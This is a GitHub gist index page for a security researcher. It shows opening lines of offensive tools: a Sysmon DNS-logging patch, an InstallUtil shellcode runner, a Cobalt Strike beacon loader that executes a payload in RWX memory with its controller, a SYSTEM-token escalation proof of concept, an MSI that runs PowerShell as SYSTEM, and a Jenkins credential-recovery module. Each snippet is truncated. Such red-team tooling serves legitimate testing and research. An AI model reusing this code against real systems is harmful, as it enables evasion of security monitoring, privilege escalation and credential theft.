Skip to content

Instantly share code, notes, and snippets.

xpn xpn

Block or report user

Report or block xpn

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@xpn
xpn / tasks.cs
Created Aug 19, 2019
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
View tasks.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
@xpn
xpn / dns_sysmon_patch.c
Last active Jun 29, 2019
View dns_sysmon_patch.c
#include <iostream>
#include <Windows.h>
#include <WinDNS.h>
// Pattern for hunting dnsapi!McTemplateU0zqxqz
#define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c"
#define PATTERN_LEN 14
// Search for pattern in memory
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {
@xpn
xpn / InstallUtil-Shellcode-cs
Created May 11, 2018 — forked from lithackr/InstallUtil-Shellcode-cs
From https://gist.github.com/subTee/408d980d88515a539672
View InstallUtil-Shellcode-cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@xpn
xpn / clr_via_native.c
Created Apr 11, 2018
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@xpn
xpn / external_client_filetransfer.cpp
Created Mar 28, 2018
View external_client_filetransfer.cpp
#include "stdafx.h"
// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {
HANDLE threadHandle;
DWORD threadId = 0;
char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(alloc, payload, len);
@xpn
xpn / external_client.cpp
Created Mar 28, 2018
View external_client.cpp
#include "stdafx.h"
// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {
HANDLE threadHandle;
DWORD threadId = 0;
char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(alloc, payload, len);
@xpn
xpn / external_controller.py
Last active Jul 20, 2019
View external_controller.py
import socket
import struct
import time
class ExternalC2Controller:
def __init__(self, port):
self.port = port
def encodeFrame(self, data):
return struct.pack("<I", len(data)) + data
@xpn
xpn / getsystem_parent.cpp
Created Nov 20, 2017
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
View getsystem_parent.cpp
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
TOKEN_PRIVILEGES tpPrevious;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
@xpn
xpn / msigen.wix
Created Nov 6, 2017
WIX file with embedded Powershell, which will be executed as SYSTEM
View msigen.wix
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
@xpn
xpn / jenkins_passwords.rb
Created Oct 15, 2017
Recover jenkins credentials in meterpreter
View jenkins_passwords.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'nokogiri'
require 'digest'
require 'openssl'
require 'base64'
You can’t perform that action at this time.